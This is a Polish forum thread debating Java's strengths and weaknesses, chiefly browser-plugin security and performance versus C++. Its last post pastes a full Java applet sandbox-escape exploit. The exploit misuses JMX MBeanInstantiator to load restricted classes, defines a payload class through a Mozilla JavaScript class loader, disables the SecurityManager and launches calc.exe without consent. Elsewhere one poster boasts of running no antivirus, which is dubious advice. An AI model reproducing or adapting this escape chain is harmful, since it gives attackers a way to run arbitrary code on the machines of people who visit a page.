[Dyskusja] Java Plusy i Minusy

[Vesim]

Bo JS, Javy i Flasha nic nie łączy.

Widzę że ktoś czytać nie umie, napisałem ze pod względem bezpieczeństwa. I jak na razie to tylko zaprzeczyłeś temu co napisałem, bez zadnych argumentów.

[Gość]

Widzę że ktoś czytać nie umie, napisałem ze pod względem bezpieczeństwa. I jak na razie to tylko zaprzeczyłeś temu co napisałem, bez zadnych argumentów.

No nie są podobne pod względem bezpieczeństwa, bo JS jest interpretowany przez przeglądarkę, Java przez JVM od Oracle, Flash przez wtyczkę od Adobe.

[Vesim]

No nie są podobne pod względem bezpieczeństwa, bo JS jest interpretowany przez przeglądarkę, Java przez JVM od Oracle, Flash przez wtyczkę od Adobe.

 

Chodziło mi o możliwości exploitów, i różnicy przez co jest interpretowany nie ma, wystarczy możliwość ściągniecia i uruchomienia programu, jak to się da to więcej do szczęścia nie potrzeba.

[piotrek54PL]

Chodziło mi o możliwości exploitów, i różnicy przez co jest interpretowany nie ma, wystarczy możliwość ściągniecia i uruchomienia programu, jak to się da to więcej do szczęścia nie potrzeba.

No nie, bo jest uruchamiany przez 3 różne interpretery, i jeden zezwoli na np. dostęp do procesów komputera, edycję wrażliwych danych a inny interpreter nie zezwoli.

[Gość]

Hejtujcie czy nie. Mówcie że java nie jest bezpieczna, że jest wolna.

Zobaczymy się za 10 lat.
Jak ma uruchomioną wtyczkę javy to tak jakby otwierał wszystkie pliki z internetu To normalne że można się włamać na kompa przez apleta bo java to nie jest jakiś tam python czy inny interpreter. To jest coś więcej, a żeby mieć coś więcej trzeba wiedzieć jak się tego używa. Żaden jezyk poziomu javy nie jest bezpieczny. Żaden... Więc mówienie że java nie jest bezpieczna mija się z celem.

[Vesim]

Dla tego mam jedynie JS'a włączonego. Żaden antywirus nie zabezpieczy tak samo jak IQ powyżej chomika, nie używam antywirusa od ponad 1,5 roku, jak widać komp działa dobrze(jedynie zamula, ale taki urok Windowsa). Java była, jest i będzie wolniejsza od programów napisanych w C++ i bezpieczniejsza też nie będzie.

[Gość]

http://www.azulsystems.com/blog/cliff/2009-09-06-java-vs-c-performanceagain

Dla dociekliwych

[FrozenShade]

Napisanie softu o pewnej konkretnej funkcjonalności w c++ to jakieś 2-5x więcej czasu niż napisanie tego samego w c#/java. Oprogramowanie staje sie coraz bardziej złożone, wymagania rosną, pogon za pieniądzem, oszczędności w firmach. Jeśli dany zespół jest w stanie stworzyć oprogramowanie w czasie dużo krótszym używając języka wyższego poziomu to oczywiście taki język zostanie wybrany. Klient co najwyżej kupi mocniejszy serwer, przy wdrożeniach na kwoty setek tyś zł nikt nie przejmuje się tym, że trzeba wydać 10tyś więcej na serwer. Dlatego właśnie java i c# maja się bardzo dobrze w większości biznesowych zagadnień, poza bardzo specyficznymi i niszowymi tematami.

0day, proszę.... potężny soft stojący na serwerze w firmie, obsługujący przykładowo hale produkcyjna lub będący centrum danych dla całego budynku jest wystarczająco zabezpieczony przez sztab wykwalifikowanych informatyków, na takie maszyny nie ma wejścia z zewnątrz (przynajmniej nie powinno być).

Równie dobrze można spierdzielić soft pisany w c++, zwykłe przepełnienie bufora i 'wstrzyknięcie' w danych przychodzących wykonywalnego kodu jest tak samo niebezpieczne jak każda dziura w javie.

 

Imho, jak chcecie napisać driver do sprzętu to bierzecie DDK i rzeźbicie w c/c++. jak chcecie napisać stronkę to bierzecie php a jak chcecie napisać gierkę to java, flash, c# są wystarczające. I tak nikt się wam na to nie włamie. Boicie się javy? Bójcie się też MySQL, oracle popsuł.

 

Wg mnie dalsze gadanie o 'bezpieczeństwie' nie ma sensu. Chcecie być bezpieczni, odepnijcie kabel sieciowy, klawiaturę i mysz od kompa.

[AdirasOwns]

Może teraz parę słów na temat prostych gier 2d pisanych w javie? Ich wydajność, możliwości...

[Gość]

Może teraz parę słów na temat prostych gier 2d pisanych w javie? Ich wydajność, możliwości...

Możliwości , jak wszędzie - zależą od programisty.

Wydajność - zrób i odpowiedz sobie sam na pytanie. Wszystko zależy od tego JAK ją zrobisz.

[Scyzors]

Szczerze to JAVA nawet jeśli nie jest bezpieczna to i tak ktoś używający programów napisanych w javie może zarazić komputer wirusem wchodząc na jakieś strony zawirusowane i ściągając różne boty napisane w autoit, c++ itp i wcale nie musi to być przez jave . Wszystko zależy od użytkownika. A dobrzy hackerzy nie będą się włamywali na kompa jakiegoś newbie i już raczej nie używając "niebezpiecznych" programów napisanych w javie i zresztą nie będą się też włamywali na kompa jakiegoś dzieciaka co ma serwer w mc tylko po to, żeby go ukraść i gówno z tego mieć.

[rafradek]

Wyjaśnijcie mi kwestię bezpieczeństwa oraz dlaczego java jest niebezpieczna. Bo tak to można stwierdzić że kod maszynowy jest najniebezpieczniejszy, bo ma największy wpływ na to co dzieje na komputerze.

[Gość]

Wyjaśnijcie mi kwestię bezpieczeństwa oraz dlaczego java jest niebezpieczna. Bo tak to można stwierdzić że kod maszynowy jest najniebezpieczniejszy, bo ma największy wpływ na to co dzieje na komputerze.

Np że może pobrać wirusa bez twojej wiedzy lol.

Praktycznie tak samo niebezpieczna jak odpalanie nieznanych programów na kompie.

[rafradek]

Np że może pobrać wirusa bez twojej wiedzy lol.

Praktycznie tak samo niebezpieczna jak odpalanie nieznanych programów na kompie.

To jest wina przeglądarki/użytkownika bo zezwoliła na uruchomienie jakiegoś kodu który to spowodował.

Aplety na stronach uruchamiają się za zgodą użytkownika.

 

Język programowania nie może być bardziej lub mniej niebezpieczny - sam plik tekstowy nic nie zrobi, wcześniej musi być interpretowany przez kompilator bądź inny program

[Gość]

To jest wina przeglądarki/użytkownika bo zezwoliła na uruchomienie jakiegoś kodu który to spowodował.

Aplety na stronach uruchamiają się za zgodą użytkownika.

 

Język programowania nie może być bardziej lub mniej niebezpieczny - sam plik tekstowy nic nie zrobi, wcześniej musi być interpretowany przez kompilator bądź inny program

Umm ja miałem na myśli że możesz bez zgody użytkownika zapisać plik jaki tylko chcesz na kompie.

[Gość]

Macie, przykładowy expolit w jarbie:

import java.applet.Applet;
import com.sun.jmx.mbeanserver.Introspector;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import javax.management.ReflectionException;
import java.io.*;
 
public class Expolit extends Applet
{
 
  public void init()
  {
   
    try
    {  
           int length;
           byte[] buffer = new byte[5000];
           ByteArrayOutputStream os = new ByteArrayOutputStream();
           
           // czytanie pliku class z jar
           InputStream is = getClass().getResourceAsStream("Payload.class");
           
           // zapisywanie do strumienia bajtów
           while( ( length = is.read( buffer ) ) > 0 )
               os.write( buffer, 0, length );
               
           // konwersja do zwykłego arreja
           buffer = os.toByteArray();
           
//no i przeglądarka, w tym przypadku ff, dla innej by to inaczej wygladało
          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
         
          Method method = getMethod(class1, "enter", true);
          Object obj = method.invoke(null, new Object[0]);
          Method method1 = getMethod(class1, "createClassLoader", false);
          Object obj1 = method1.invoke(obj, new Object[1]);
   
          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
          Method method2 = getMethod(class2, "defineClass", false);
         
          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
          my_class.newInstance();
          Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
          m_outSandbox.invoke(null, new Object[] {});
     
    }
    catch (Throwable localThrowable){}
   
  }
   
 
   private Method getMethod(Class class1, String s, boolean flag)
  {
    try {
      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
      Method[] amethod1 = amethod;
     
      for (int i = 0; i < amethod1.length; i++) {
        Method method = amethod1[i];
        String s1 = method.getName();
        Class[] aclass = method.getParameterTypes();
        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
      }
    } catch (Exception localException) {  }
 
    return null;
  }
 //zwracanie klasy, normalnie by się nie udało
  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  {
    Object obj = null;
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
       
    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  }
 
}
 
###############################################
import java.lang.reflect.Method;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
 
public class Payload implements PrivilegedExceptionAction
{
   
    public Payload()
    {
        try
        {
            AccessController.doPrivileged(this);
        }
        catch(Exception exception) { }
    }
 
    public Object run() throws Exception
    {
        Class cl = System.class;
        Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
        m.invoke(null, new Object[1]);
        return null;
    }
 
    public static void outSandbox() throws Exception
    {
//wywolywanie bez zgody
        Runtime.getRuntime().exec("calc.exe");
    }
}